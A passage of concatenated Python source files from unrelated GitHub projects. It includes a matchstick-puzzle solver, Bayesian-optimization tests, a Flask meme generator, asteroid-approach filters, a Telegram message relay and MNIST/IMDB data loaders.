self.multi_flows[i], self.multi_masks[i], self.multi_rhos[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
mask = utility.get_mask(output[i][1]).expand(output[i][1].size(0), \
3, output[i][1].size(2), output[i][1].size(3))
final_pred = utility.get_final_pred(self.multi_ref_images[i], \
pred_images[i], mask, output[i][2])
rec_loss = self.opt.img_w * self.rec_criterion()(final_pred, \
self.multi_tar_images[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
loss_iter[f'Scale {i} mask'] += mask_loss.item()
loss_iter[f'Scale {i} rho'] += rho_loss.item()
loss_iter[f'Scale {i} flow'] += flow_loss.item()
loss_iter[f'Scale {i} rec'] += rec_loss.item()
if (iter+1) % self.opt.val_display == 0:
loss_epoch[iter] = self.display(epoch+1, iter+1, num_batches, loss_iter, split)
for i in range(self.opt.ms_num):
loss_iter[f'Scale {i} mask'] = 0
loss_iter[f'Scale {i} rho'] = 0
loss_iter[f'Scale {i} flow'] = 0
loss_iter[f'Scale {i} rec'] = 0
if (iter+1) % self.opt.val_save == 0:
self.save_ms_results(epoch+1, iter+1, output, pred_images, split, 0)
rec_err /= size
rho_err /= size
flow_err /= size
mask_err /= size
eval_str = f'rec_err: {rec_err}\nrho_err: {rho_err}\nflow_err: {flow_err}\nmask_err: {mask_err}\n'
average_loss = utility.build_loss_string(utility.dict_of_dict_average(loss_epoch))
average_loss = eval_str + average_loss
print(f'\n\n --> Epoch: [{epoch+1}] Loss summary: \n{average_loss}')
return average_loss
def display(self, epoch: int, iter: int, num_batches: int, loss: dict, split: str) -> float:
        interval = self.opt.train_display if split == 'train' else self.opt.val_display
average_loss = utility.dict_divide(loss, interval)
print(f'\n\n --> Epoch ({split}): [{epoch}][{iter}/{num_batches}]')
print(utility.build_loss_string(average_loss))
return average_loss
def setup_inputs(self, sample: dict) -> Tensor:
self.copy_inputs(sample)
if not self.opt.refine:
self.generate_ms_inputs(sample)
network_input = self.input_image
else:
checkpoint = torch.load(self.opt.pred_dir)
model = checkpoint['model']
network_input = model.forward(self.input_image)[self.opt.ms_num-1]
network_input.insert(0, nn.functional.interpolate(
self.input_image, (512,512), mode='bicubic', align_corners=True))
return network_input
def copy_inputs(self, sample: dict) -> None:
del self.ref_images
del self.tar_images
del self.masks
del self.rhos
del self.flows
del self.input_image
self.input_image = torch.cuda.FloatTensor()
self.ref_images = torch.cuda.FloatTensor()
self.tar_images = torch.cuda.FloatTensor()
self.masks = torch.cuda.FloatTensor()
self.rhos = torch.cuda.FloatTensor()
self.flows = torch.cuda.FloatTensor()
n, c, h, w = list(sample['images'].size())
sh, sw = list(sample['input'].size()[2:])
self.input_image.resize_(n, 3, sh, sw).copy_(sample['input'])
self.ref_images.resize_(n, 3, h, w).copy_(sample['images'][:,:3,:,:])
self.tar_images.resize_(n, 3, h, w).copy_(sample['images'][:,3:,:,:])
self.masks.resize_(n, h, w).copy_(sample['masks'])
self.rhos.resize_(n, h, w).copy_(sample['rhos'])
self.flows.resize_(n, 3, h, w).copy_(sample['flows'])
def generate_ms_inputs(self, sample: dict) -> None:
multiscale_in = [self.ref_images, self.tar_images, self.rhos, self.masks, self.flows]
multiscale_out = self.multi_scale_data(multiscale_in)
self.multi_ref_images = multiscale_out[0]
self.multi_tar_images = multiscale_out[1]
self.multi_rhos = multiscale_out[2]
self.multi_masks = multiscale_out[3]
self.multi_flows = multiscale_out[4]
for i in range(self.opt.ms_num):
# rescale the loss weight for flow in different scale
ratio = 2 ** (self.opt.ms_num - i - 1)
self.multi_flows[i][:, 2, :] *= ratio
self.multi_masks[i] = self.multi_masks[i].unsqueeze(1)
self.multi_rhos[i] = self.multi_rhos[i].unsqueeze(1)
```
{
"source": "1at7/matchstick-puzzle",
"score": 4
}
#### File: 1at7/matchstick-puzzle/solution.py
```python
def solution(eqn,map_matchsticks,all_,plus_one,zero,minus_one):
print("Given equation is : ",eqn)
first = int(eqn[0])
sign = eqn[1]
second = int(eqn[2])
third = int(eqn[4])
total_sticks = map_matchsticks[first]+map_matchsticks[sign]+map_matchsticks[second]+map_matchsticks[third]
choices_first = all_[first]
choices_second = all_[second]
choices_third = all_[third]
choices_sign = ["+","-"]
possible = []
added = 0
moved = 0
removed = 0
for i in choices_first:
for j in choices_second:
for k in choices_third:
for l in choices_sign:
sticks = map_matchsticks[i]+map_matchsticks[j]+map_matchsticks[k]+map_matchsticks[l]
if sticks == total_sticks:
                        # plus_one has no "+" key and minus_one no "-" key,
                        # so use .get() with an empty default in place of the
                        # original try/except blocks (same behavior, clearer)
                        if i in plus_one.get(first, []): added += 1
                        if i in zero.get(first, []): moved += 1
                        if i in minus_one.get(first, []): removed += 1
                        if j in plus_one.get(second, []): added += 1
                        if j in zero.get(second, []): moved += 1
                        if j in minus_one.get(second, []): removed += 1
                        if k in plus_one.get(third, []): added += 1
                        if k in zero.get(third, []): moved += 1
                        if k in minus_one.get(third, []): removed += 1
                        if l in plus_one.get(sign, []): added += 1
                        if l in minus_one.get(sign, []): removed += 1
#print(added, removed, '\t', [i,l,j,k])
if added==1 and removed==1 and moved==0:
possible.append([i,l,j,k])
elif moved==1 and removed==0 and added==0:
possible.append([i,l,j,k])
added=0
removed=0
moved=0
#print("Possible solutions : ",possible)
correct=0
for i in possible:
#print(i)
results = eval(str(i[0])+i[1]+str(i[2]))
if results==i[3]:
correct+=1
print("Corrected equation is : "+str(i[0])+i[1]+str(i[2])+"="+str(i[3]))
if correct==0:
print("No possible solution to equation for : ",eqn)
return None
map_matchsticks = {0:6,1:2,2:5,3:5,4:4,5:5,6:6,7:3,8:7,9:6,"+":2,"-":1}
plus_one = {0:[8],1:[7],2:[],3:[],4:[],5:[6,9],6:[8],7:[],8:[],9:[8],"-":["+"]}
zero = {0:[6,9],1:[],2:[3],3:[5,2],4:[],5:[3],6:[0,9],7:[],8:[],9:[0,6]}
#can_not = {4:4}
minus_one = {0:[],1:[],2:[],3:[],4:[],5:[],6:[5],7:[1],8:[0,9,6],9:[5,3],"+":["-"]}
all_ = {0:[0,6,9,8],1:[1,7],2:[2,3],3:[3,5,2],4:[4],5:[5,3,6,9],6:[6,0,5,8,9],7:[7,1],8:[8,0,6,9],9:[9,0,3,5,6,8]}
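# The tables above encode matchstick arithmetic: map_matchsticks gives each
# symbol's stick count, plus_one[s] lists symbols reachable from s by adding
# one stick, zero[s] by moving one stick within s, and minus_one[s] by
# removing one stick. A quick consistency sketch over the tables themselves:
#
#   for s, targets in plus_one.items():
#       for t in targets:
#           assert map_matchsticks[t] == map_matchsticks[s] + 1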
eqn_arr = []
eqn_arr.append("5+7=2") # 9 - 7 = 2
eqn_arr.append("4-1=6") # 4 + 1 = 5
eqn_arr.append("6+4=4") # 0 + 4 = 4 and 8 - 4 = 4
eqn_arr.append("6-2=1") # no solution
eqn_arr.append("6+8=8") # 8 + 0 = 8 or 0 + 8 = 8
eqn_arr.append("3+3=5") # 3+2=5 or 5+2=3
eqn_arr.append("5+9=9")
for i in eqn_arr:
solution(i, map_matchsticks, all_, plus_one, zero, minus_one)
```
{
"source": "1aut/BayesianOptimization",
"score": 2
}
#### File: BayesianOptimization/tests/test_target_space.py
```python
import pytest
import numpy as np
from bayes_opt.target_space import TargetSpace
def target_func(**kwargs):
# arbitrary target func
return sum(kwargs.values())
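# e.g. target_func(p1=1, p2=2) == 3 -- it simply sums its keyword arguments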
PBOUNDS = {'p1': (0, 1), 'p2': (1, 100)}
def test_keys_and_bounds_in_same_order():
pbounds = {
'p1': (0, 1),
'p3': (0, 3),
'p2': (0, 2),
'p4': (0, 4),
}
space = TargetSpace(target_func, pbounds)
assert space.dim == len(pbounds)
assert space.empty
assert space.keys == ["p1", "p2", "p3", "p4"]
assert all(space.bounds[:, 0] == np.array([0, 0, 0, 0]))
assert all(space.bounds[:, 1] == np.array([1, 2, 3, 4]))
def test_params_to_array():
space = TargetSpace(target_func, PBOUNDS)
assert all(space.params_to_array({"p1": 2, "p2": 3}) == np.array([2, 3]))
assert all(space.params_to_array({"p2": 2, "p1": 9}) == np.array([9, 2]))
with pytest.raises(ValueError):
space.params_to_array({"p2": 1})
with pytest.raises(ValueError):
space.params_to_array({"p2": 1, "p1": 7, "other": 4})
with pytest.raises(ValueError):
space.params_to_array({"other": 1})
def test_array_to_params():
space = TargetSpace(target_func, PBOUNDS)
assert space.array_to_params(np.array([2, 3])) == {"p1": 2, "p2": 3}
with pytest.raises(ValueError):
space.array_to_params(np.array([2]))
with pytest.raises(ValueError):
space.array_to_params(np.array([2, 3, 5]))
def test_as_array():
space = TargetSpace(target_func, PBOUNDS)
x = space._as_array([0, 1])
assert x.shape == (2,)
assert all(x == np.array([0, 1]))
x = space._as_array({"p2": 1, "p1": 2})
assert x.shape == (2,)
assert all(x == np.array([2, 1]))
with pytest.raises(ValueError):
x = space._as_array([2, 1, 7])
with pytest.raises(ValueError):
x = space._as_array({"p2": 1, "p1": 2, "other": 7})
with pytest.raises(ValueError):
x = space._as_array({"p2": 1})
with pytest.raises(ValueError):
x = space._as_array({"other": 7})
def test_register():
space = TargetSpace(target_func, PBOUNDS)
assert len(space) == 0
# registering with dict
space.register(params={"p1": 1, "p2": 2}, target=3)
assert len(space) == 1
assert all(space.params[0] == np.array([1, 2]))
assert all(space.target == np.array([3]))
# registering with array
space.register(params={"p1": 5, "p2": 4}, target=9)
assert len(space) == 2
assert all(space.params[1] == np.array([5, 4]))
assert all(space.target == np.array([3, 9]))
with pytest.raises(KeyError):
space.register(params={"p1": 1, "p2": 2}, target=3)
with pytest.raises(KeyError):
space.register(params={"p1": 5, "p2": 4}, target=9)
def test_probe():
space = TargetSpace(target_func, PBOUNDS)
assert len(space) == 0
# probing with dict
space.probe(params={"p1": 1, "p2": 2})
assert len(space) == 1
assert all(space.params[0] == np.array([1, 2]))
assert all(space.target == np.array([3]))
# probing with array
space.probe(np.array([5, 4]))
assert len(space) == 2
assert all(space.params[1] == np.array([5, 4]))
assert all(space.target == np.array([3, 9]))
# probing same point with dict
space.probe(params={"p1": 1, "p2": 2})
assert len(space) == 2
assert all(space.params[1] == np.array([5, 4]))
assert all(space.target == np.array([3, 9]))
# probing same point with array
space.probe(np.array([5, 4]))
assert len(space) == 2
assert all(space.params[1] == np.array([5, 4]))
assert all(space.target == np.array([3, 9]))
def test_random_sample():
pbounds = {
'p1': (0, 1),
'p3': (0, 3),
'p2': (0, 2),
'p4': (0, 4),
}
space = TargetSpace(target_func, pbounds, random_state=8)
for _ in range(50):
random_sample = space.random_sample()
assert len(random_sample) == space.dim
assert all(random_sample >= space.bounds[:, 0])
assert all(random_sample <= space.bounds[:, 1])
def test_max():
space = TargetSpace(target_func, PBOUNDS)
assert space.max() == {}
space.probe(params={"p1": 1, "p2": 2})
space.probe(params={"p1": 5, "p2": 4})
space.probe(params={"p1": 2, "p2": 3})
space.probe(params={"p1": 1, "p2": 6})
assert space.max() == {"params": {"p1": 5, "p2": 4}, "target": 9}
def test_res():
space = TargetSpace(target_func, PBOUNDS)
assert space.res() == []
space.probe(params={"p1": 1, "p2": 2})
space.probe(params={"p1": 5, "p2": 4})
space.probe(params={"p1": 2, "p2": 3})
space.probe(params={"p1": 1, "p2": 6})
expected_res = [
{"params": {"p1": 1, "p2": 2}, "target": 3},
{"params": {"p1": 5, "p2": 4}, "target": 9},
{"params": {"p1": 2, "p2": 3}, "target": 5},
{"params": {"p1": 1, "p2": 6}, "target": 7},
]
assert len(space.res()) == 4
assert space.res() == expected_res
def test_set_bounds():
pbounds = {
'p1': (0, 1),
'p3': (0, 3),
'p2': (0, 2),
'p4': (0, 4),
}
space = TargetSpace(target_func, pbounds)
# Ignore unknown keys
space.set_bounds({"other": (7, 8)})
assert all(space.bounds[:, 0] == np.array([0, 0, 0, 0]))
assert all(space.bounds[:, 1] == np.array([1, 2, 3, 4]))
# Update bounds accordingly
space.set_bounds({"p2": (1, 8)})
assert all(space.bounds[:, 0] == np.array([0, 1, 0, 0]))
assert all(space.bounds[:, 1] == np.array([1, 8, 3, 4]))
if __name__ == '__main__':
r"""
CommandLine:
python tests/test_target_space.py
"""
pytest.main([__file__])
```
{
"source": "1ayham1/Data_Science-MemesGenerator",
"score": 3
}
#### File: 1ayham1/Data_Science-MemesGenerator/app.py
```python
import random
import os
import requests
from flask import Flask, render_template, request
from MemeEngine import MemeEngine
from QuoteEngine import Ingestor
app = Flask(__name__)
meme = MemeEngine('./static')
def setup():
""" Load all resources """
quote_files = ['./_data/DogQuotes/DogQuotesTXT.txt',
'./_data/DogQuotes/DogQuotesDOCX.docx',
'./_data/DogQuotes/DogQuotesPDF.pdf',
'./_data/DogQuotes/DogQuotesCSV.csv']
quotes = []
for f in quote_files:
quotes.extend(Ingestor.parse(f))
images_path = "./_data/photos/dog/"
imgs = []
for root, dirs, files in os.walk(images_path):
imgs = [os.path.join(root, name) for name in files]
return quotes, imgs
quotes, imgs = setup()
@app.route('/')
def meme_rand():
""" Generate a random meme """
img = random.choice(imgs)
quote = random.choice(quotes)
out_path = meme.make_meme(img, quote.body, quote.author)
#return render_template('meme.html', path=out_path)
return render_template('meme.html', path=os.path.relpath(out_path))
@app.route('/create', methods=['GET'])
def meme_form():
""" User input for meme information """
return render_template('meme_form.html')
@app.route('/create', methods=['POST'])
def meme_post():
""" Create a user defined meme
Help was obtained from knowledge Area
"""
image_url = request.form['image_url']
img_request = requests.get(image_url, allow_redirects=True)
body = request.form['body']
author = request.form['author']
# form param to a temp local file.
tmp = f'./static/{random.randint(0, 1000000)}.jpg'
with open(tmp, 'wb') as img_file:
img_file.write(img_request.content)
# generate a meme using this temp file.
path = meme.make_meme(tmp, body, author)
# Remove the temporary saved image.
os.remove(tmp)
return render_template('meme.html', path=path)
if __name__ == "__main__":
app.run()
```
#### File: Data_Science-MemesGenerator/QuoteEngine/QuoteModel.py
```python
class QuoteModel:
def __init__(self, body: str, author: str) -> None:
"""initialization"""
self.body = body
self.author = author
def __repr__(self):
"""machine friendly object print"""
        return f'<{self.body}, {self.author}>'
```
{
"source": "1ayham1/PROG_Pyth-Exploring_NearEarthObjects",
"score": 3
}
#### File: 1ayham1/PROG_Pyth-Exploring_NearEarthObjects/filters.py
```python
import operator
from itertools import islice
class UnsupportedCriterionError(NotImplementedError):
"""A filter criterion is unsupported."""
class AttributeFilter:
"""A general superclass for filters on comparable attributes.
An `AttributeFilter` represents the search criteria pattern comparing some
attribute of a close approach, or its attached NEO to a reference value. It
essentially functions as a callable predicate for whether a
`CloseApproach` object satisfies the encoded criterion.
It is constructed with a comparator operator and a reference value, and
calling the filter (with __call__) executes `get(approach) OP value` (in
infix notation).
Concrete subclasses can override the `get` classmethod to provide custom
behavior to fetch a desired attribute from the given `CloseApproach`.
"""
def __init__(self, op, value):
"""Construct a new `AttributeFilter` from a binary predicate and
a reference value.
The reference value will be supplied as the second (right-hand side)
argument to the operator function. For example, an `AttributeFilter`
with `op=operator.le` and `value=10` will, when called on an approach,
evaluate `some_attribute <= 10`.
- <=, ==, or >= - available as operator.le, operator.eq, and
        operator.ge; i.e., operator.ge(a, b) is the same as a >= b.
:param op: A 2-argument predicate comparator (such as `operator.le`).
:param value: The reference value to compare against. It is supplied
by the user
at the command line and fed to create_filters by the main module.
"""
self.op = op
self.value = value
def __call__(self, approach):
"""Invoke self(approach)
The __call__ method makes instance objects of this type behave as
callables. With an instance of a subclass of AttributeFilter named f,
then the code f(approach) evaluates f.__call__(approach). Specifically,
"calling" the AttributeFilter with a CloseApproach object will get
the attribute of interest (self.get(approach)) and compare
it (via self.op) to the reference value (self.value), returning either
        True or False, representing whether that close approach satisfies the
criterion.
"""
return self.op(self.get(approach), self.value)
@classmethod
def get(cls, approach):
"""Get an attribute of interest from a close approach.
Concrete subclasses must override this method to get an attribute of
interest from the supplied `CloseApproach`.
:param approach: A `CloseApproach` on which to evaluate this filter.
:return:
The value of an attribute of interest, comparable to
`self.value` via `self.op`.
"""
# one option is to make it also abstract
raise UnsupportedCriterionError # subclass of NotImplementedError
def __repr__(self):
return (
f"{self.__class__.__name__}(op=operator.{self.op.__name__},"
f" value={self.value})"
)
class DesignationFilter(AttributeFilter):
"""build an AttributeFilter that filtered on the designation attribute
of the NearEarthObject attached to a CloseApproach,
define a new subclass of AttributeFilter
(This is only an example & not needed because primary
designations are unique and we already have
NEODatabase.get_neo_by_designation).
"""
@classmethod
def get(cls, approach):
return approach.neo.designation
class DateFilters(AttributeFilter):
"""build an AttributeFilter that filtered on the Date attribute"""
@classmethod
def get(cls, approach):
"""
        For an input date (date, start_date, or end_date), return the
        corresponding approach.time converted to a date object.
"""
return approach.time.date()
class DistanceFilters(AttributeFilter):
"""build an AttributeFilter that filtered on Distance attribute"""
@classmethod
def get(cls, approach):
"""
        For an input distance bound (min or max), return the
        corresponding approach.distance.
"""
return approach.distance
class VelocityFilters(AttributeFilter):
"""build an AttributeFilter that filtered on the velocity attribute"""
@classmethod
def get(cls, approach):
"""
        For an input velocity bound (min or max), return the
        corresponding approach.velocity.
"""
return approach.velocity
class DiameterFilters(AttributeFilter):
"""build an AttributeFilter that filtered on diameter attribute"""
@classmethod
def get(cls, approach):
"""
        For an input diameter bound (min or max), return the
        corresponding approach.neo.diameter.
"""
return approach.neo.diameter
class HazardousFilter(AttributeFilter):
"""build an AttributeFilter that filtered on hazardous attribute"""
@classmethod
def get(cls, approach):
"""
        For an input hazardous flag, return the corresponding
        approach.neo.hazardous (the filter is only created when
        hazardous is not None).
"""
return approach.neo.hazardous
def create_filters(date=None, start_date=None, end_date=None,
distance_min=None, distance_max=None,
velocity_min=None, velocity_max=None,
diameter_min=None, diameter_max=None,
hazardous=None):
"""Create a collection of filters from user-specified criteria.
Each of these arguments is provided by the main module with a value
from the user's options at the command line. Each one corresponds to
a different type of filter. For example, the `--date` option corresponds
to the `date` argument, and represents a filter that selects close
    approaches that occurred on exactly that given date. Similarly,
the `--min-distance` option corresponds to the `distance_min` argument,
and represents a filter that selects close approaches whose nominal
approach distance is at least that far away from Earth. Each option
is `None` if not specified at the command
line (in particular, this means that the `--not-hazardous` flag results
in `hazardous=False`, not to be confused with `hazardous=None`).
The return value must be compatible with the `query` method of
`NEODatabase` because the main module directly passes this result
to that method. For now, this can be thought of as a collection of
`AttributeFilter`s.
:param date (datetime objects):
A `date` on which a matching `CloseApproach` occurs.
:param start_date:
A `date` on or after which a matching `CloseApproach` occurs.
:param end_date:
A `date` on or before which a matching `CloseApproach` occurs.
:param distance_min (float):
A min nominal approach distance for a matching `CloseApproach`.
:param distance_max (float):
A max nominal approach distance for a matching `CloseApproach`.
:param velocity_min (float):
A min relative approach velocity for a matching `CloseApproach`
:param velocity_max (float):
A max relative approach velocity for a matching `CloseApproach`
:param diameter_min (float):
A min diameter of the NEO of a matching `CloseApproach`.
:param diameter_max (float):
A maximum diameter of the NEO of a matching `CloseApproach`.
:param hazardous (bool):
if the NEO of a matching `CloseApproach` is potentially hazardous.
:return:
A collection of filters for use with `query`.
"""
filters_list = []
if date:
filters_list.append(DateFilters(operator.eq, date))
if start_date:
filters_list.append(DateFilters(operator.ge, start_date))
if end_date:
filters_list.append(DateFilters(operator.le, end_date))
if distance_min:
filters_list.append(DistanceFilters(operator.ge, distance_min))
if distance_max:
filters_list.append(DistanceFilters(operator.le, distance_max))
if velocity_min:
filters_list.append(VelocityFilters(operator.ge, velocity_min))
if velocity_max:
filters_list.append(VelocityFilters(operator.le, velocity_max))
if diameter_min:
filters_list.append(DiameterFilters(operator.ge, diameter_min))
if diameter_max:
filters_list.append(DiameterFilters(operator.le, diameter_max))
if hazardous is not None:
filters_list.append(HazardousFilter(operator.eq, hazardous))
return filters_list
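# A usage sketch ('approaches' is a hypothetical iterable of CloseApproach
# objects; this mirrors how NEODatabase.query is expected to consume the
# returned collection):
#
#   filters = create_filters(distance_min=0.05, hazardous=True)
#   matches = (a for a in approaches if all(f(a) for f in filters))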
def limit(iterator, n=None):
"""Produce a limited stream of values from an iterator.
If `n` is 0 or None, don't limit the iterator at all.
:param iterator: An iterator of values.
:param n: The maximum number of values to produce.
:yield: The first (at most) `n` values from the iterator.
"""
# don't limit the iterator at all
if n == 0 or n is None:
return iterator
# else return first n elements from iterator:
# https://stackoverflow.com/questions/26864008/simplest-way-to-get-the-first-n-elements-of-an-iterator
return list(islice(iterator, n))
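# e.g. limit(iter(range(10)), n=3) -> [0, 1, 2]; with n=None or n=0 the
# iterator itself is returned unchanged (note the list/iterator asymmetry).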
```
{
"source": "1azunna/dd-import",
"score": 3
}
#### File: dd-import/unittests/test_environment.py
```python
from unittest import TestCase
from unittest.mock import patch
from dd_import.environment import Environment
class TestEnvironment(TestCase):
def test_check_environment_reimport_findings_empty(self):
with self.assertRaises(Exception) as cm:
environment = Environment()
environment.check_environment_reimport_findings()
self.assertEqual('DD_URL is missing / DD_API_KEY is missing / DD_PRODUCT_TYPE_NAME is missing / DD_PRODUCT_NAME is missing / DD_ENGAGEMENT_NAME is missing / DD_TEST_NAME is missing / DD_TEST_TYPE_NAME is missing', str(cm.exception))
self.assertTrue(environment.active)
self.assertTrue(environment.verified)
self.assertFalse(environment.push_to_jira)
self.assertTrue(environment.close_old_findings)
@patch.dict('os.environ', {'DD_URL': 'url',
'DD_API_KEY': 'api_key',
'DD_PRODUCT_TYPE_NAME': 'product_type',
'DD_PRODUCT_NAME': 'product',
'DD_ENGAGEMENT_NAME': 'engagement',
'DD_TEST_NAME': 'test',
'DD_TEST_TYPE_NAME': 'test_type',
'DD_FILE_NAME': 'file_name',
'DD_ACTIVE': 'False',
'DD_VERIFIED': 'False',
'DD_MINIMUM_SEVERITY': 'minimum_severity',
'DD_PUSH_TO_JIRA': 'True',
'DD_CLOSE_OLD_FINDINGS': 'False',
'DD_VERSION': 'version',
'DD_ENDPOINT_ID': 'endpoint_id',
'DD_SERVICE': 'service',
'DD_BUILD_ID': 'build_id',
'DD_COMMIT_HASH': 'commit_hash',
'DD_BRANCH_TAG': 'branch_tag'})
def test_check_environment_reimport_findings_complete(self):
environment = Environment()
environment.check_environment_reimport_findings()
self.assertEqual(environment.url, 'url')
self.assertEqual(environment.api_key, 'api_key')
self.assertEqual(environment.product_type_name, 'product_type')
self.assertEqual(environment.product_name, 'product')
self.assertEqual(environment.engagement_name, 'engagement')
self.assertEqual(environment.test_name, 'test')
self.assertEqual(environment.test_type_name, 'test_type')
self.assertEqual(environment.file_name, 'file_name')
self.assertEqual(environment.url, 'url')
self.assertFalse(environment.active)
self.assertFalse(environment.verified)
self.assertEqual(environment.minimum_severity, 'minimum_severity')
self.assertTrue(environment.push_to_jira)
self.assertFalse(environment.close_old_findings)
self.assertEqual(environment.version, 'version')
self.assertEqual(environment.endpoint_id, 'endpoint_id')
self.assertEqual(environment.service, 'service')
self.assertEqual(environment.build_id, 'build_id')
self.assertEqual(environment.commit_hash, 'commit_hash')
self.assertEqual(environment.branch_tag, 'branch_tag')
def test_check_environment_languages_empty(self):
with self.assertRaises(Exception) as cm:
environment = Environment()
environment.check_environment_languages()
self.assertEqual('DD_URL is missing / DD_API_KEY is missing / DD_PRODUCT_TYPE_NAME is missing / DD_PRODUCT_NAME is missing / DD_FILE_NAME is missing', str(cm.exception))
self.assertTrue(environment.active)
self.assertTrue(environment.verified)
self.assertFalse(environment.push_to_jira)
self.assertTrue(environment.close_old_findings)
@patch.dict('os.environ', {'DD_URL': 'url',
'DD_API_KEY': 'api_key',
'DD_PRODUCT_TYPE_NAME': 'product_type',
'DD_PRODUCT_NAME': 'product',
'DD_FILE_NAME': 'file_name'})
def test_check_environment_languages_complete(self):
environment = Environment()
environment.check_environment_languages()
self.assertEqual(environment.url, 'url')
self.assertEqual(environment.api_key, 'api_key')
self.assertEqual(environment.product_type_name, 'product_type')
self.assertEqual(environment.product_name, 'product')
self.assertEqual(environment.file_name, 'file_name')
```
{
"source": "1b0325h/osu-skin",
"score": 3
}
#### File: osu-skin/script/build.py
```python
import os
import glob
import shutil
from PIL import Image
def build():
def _name():
with open("../skin.ini", encoding="utf_8") as f:
for i in f.read().splitlines():
if i[:5] == "Name:":
                    # str.lstrip("Name: ") strips any of those characters,
                    # not the prefix, so slice off the 5-char prefix instead
                    return i[5:].strip()
else:
return "No_title"
def _ignore():
with open("../export/ignore.txt", encoding="utf_8") as f:
return f.read().splitlines()
def _copy(path, name):
for i in glob.glob(path):
shutil.copy(i, name)
name = _name()
ignore = _ignore()
os.mkdir(name)
shutil.copy("../skin.ini", name)
img = Image.new("RGBA", (1, 1), (0, 0, 0, 0))
for i in ignore:
img.save(f"{name}/{i}")
for path in ["../export/**/*.[pj][np]g", "../sound/*.[wm][ap][v3]"]:
_copy(path, name)
if __name__ == "__main__":
os.chdir(os.path.dirname(os.path.abspath(__file__)))
build()
```
{
"source": "1b15/OpenDataHackdays",
"score": 2
}
#### File: OpenDataHackdays/walk-api/predict.py
```python
import json
import falcon
import random
from .model_prediction import get_predictions
class PredictResource(object):
def on_post(self, req, resp):
# example_query = {
# "usage": "work",
# "measures": [
# {
# "date": "2019-11-20",
# "counted": "1",
# "temperature": "25",
# "rain": "11"
# }, ...
# ]
# }
# print(req.media)
if req.media is None:
resp.body = json.dumps({})
resp.status = falcon.HTTP_400
return
query = req.media
        mo, tu, we, th, fr, sa, su = get_predictions(query['countingPoint'])
example_response = {
"mo": round(mo),
"tu": round(tu),
"we": round(we),
"th": round(th),
"fr": round(fr),
"sa": round(sa),
"su": round(su),
"weekday": round((mo+tu+we+th+fr)/5),
"day": round((mo+tu+we+th+fr+sa+su)/7),
}
resp.body = json.dumps(example_response, ensure_ascii=False)
resp.status = falcon.HTTP_200
```
{
"source": "1Basile/Google_assistant_message_redirectior",
"score": 2
}
#### File: 1Basile/Google_assistant_message_redirectior/Messages rederection.py
```python
import asyncio
from telethon import TelegramClient, events
bots = [1358259148, 1109485632]
# Telethon's TelegramClient also requires an api_id and api_hash from
# https://my.telegram.org; the values below are hypothetical placeholders.
API_ID = 12345
API_HASH = '<api_hash>'
bot = TelegramClient('session_name', API_ID, API_HASH)
@bot.on(events.NewMessage(from_users=bots))
async def redirection(event):
print(event.raw_text)
if event.chat_id == 1109485632: # home_assistant_
message_id = await bot.send_message(1358259148, event.raw_text)
message_id = message_id.id
await bot.delete_messages(1358259148, message_id, revoke=True)
else:
message_id = await bot.send_message(1109485632, "bot: " + event.raw_text)
message_id = message_id.id
await bot.delete_messages(1109485632, message_id, revoke=True)
async def main():
while True:
await pass_function()
async def pass_function():
await asyncio.sleep(1)
if __name__ == '__main__':
with bot:
bot.loop.run_until_complete(main())
``` |
{
"source": "1bayezian/deep-net",
"score": 3
} |
#### File: 1bayezian/deep-net/data.py
```python
import numpy as np
from urllib import request
import gzip
import pickle
import os
def load_synth(num_train = 60_000, num_val = 10_000, seed = 0):
"""
Load some very basic synthetic data that should be easy to classify. Two features, so that we can plot the
decision boundary (which is an ellipse in the feature space).
:param num_train: Number of training instances
    :param num_val: Number of test/validation instances
    :param seed: Seed for the random number generator
    :return: Two tuples (xtrain, ytrain), (xval, yval) and the number of features; the data is a floating point numpy array
"""
np.random.seed(seed)
THRESHOLD = 0.6
quad = np.asarray([[1, 0.5], [1, .2]])
ntotal = num_train + num_val
x = np.random.randn(ntotal, 2)
# compute the quadratic form
q = np.einsum('bf, fk, bk -> b', x, quad, x)
    y = (q > THRESHOLD).astype(int)  # np.int was removed in NumPy 1.24
return (x[:num_train, :], y[:num_train]), (x[num_train:, :], y[num_train:]), 2
def load_mnist(final=False, flatten=True):
"""
Load the MNIST data
:param final: If true, return the canonical test/train split. If false, split some validation data from the training
data and keep the test data hidden.
:param flatten:
:return:
"""
if not os.path.isfile('mnist.pkl'):
init()
xtrain, ytrain, xtest, ytest = load()
xtl, xsl = xtrain.shape[0], xtest.shape[0]
if flatten:
xtrain = xtrain.reshape(xtl, -1)
xtest = xtest.reshape(xsl, -1)
if not final: # return the flattened images
return (xtrain[:-5000], ytrain[:-5000]), (xtrain[-5000:], ytrain[-5000:]), 10
return (xtrain, ytrain), (xtest, ytest), 10
# Numpy-only MNIST loader. Courtesy of <NAME>
# https://github.com/hsjeong5/MNIST-for-Numpy
filename = [
["training_images","train-images-idx3-ubyte.gz"],
["test_images","t10k-images-idx3-ubyte.gz"],
["training_labels","train-labels-idx1-ubyte.gz"],
["test_labels","t10k-labels-idx1-ubyte.gz"]
]
def download_mnist():
base_url = "http://yann.lecun.com/exdb/mnist/"
for name in filename:
print("Downloading "+name[1]+"...")
request.urlretrieve(base_url+name[1], name[1])
print("Download complete.")
def save_mnist():
mnist = {}
for name in filename[:2]:
with gzip.open(name[1], 'rb') as f:
mnist[name[0]] = np.frombuffer(f.read(), np.uint8, offset=16).reshape(-1,28*28)
for name in filename[-2:]:
with gzip.open(name[1], 'rb') as f:
mnist[name[0]] = np.frombuffer(f.read(), np.uint8, offset=8)
with open("mnist.pkl", 'wb') as f:
pickle.dump(mnist,f)
print("Save complete.")
def init():
download_mnist()
save_mnist()
def load():
with open("mnist.pkl",'rb') as f:
mnist = pickle.load(f)
return mnist["training_images"], mnist["training_labels"], mnist["test_images"], mnist["test_labels"]
# -- assignment 4 --
import wget, random, re, sys  # os, gzip and pickle are already imported above
IMDB_URL = 'http://dlvu.github.io/data/imdb.{}.pkl.gz'
IMDB_FILE = 'imdb.{}.pkl.gz'
PAD, START, END, UNK = '.pad', '.start', '.end', '.unk'
def load_imdb(final=False, val=5000, seed=0, voc=None, char=False):
cst = 'char' if char else 'word'
imdb_url = IMDB_URL.format(cst)
imdb_file = IMDB_FILE.format(cst)
if not os.path.exists(imdb_file):
wget.download(imdb_url)
with gzip.open(imdb_file) as file:
sequences, labels, i2w, w2i = pickle.load(file)
if voc is not None and voc < len(i2w):
nw_sequences = {}
i2w = i2w[:voc]
w2i = {w: i for i, w in enumerate(i2w)}
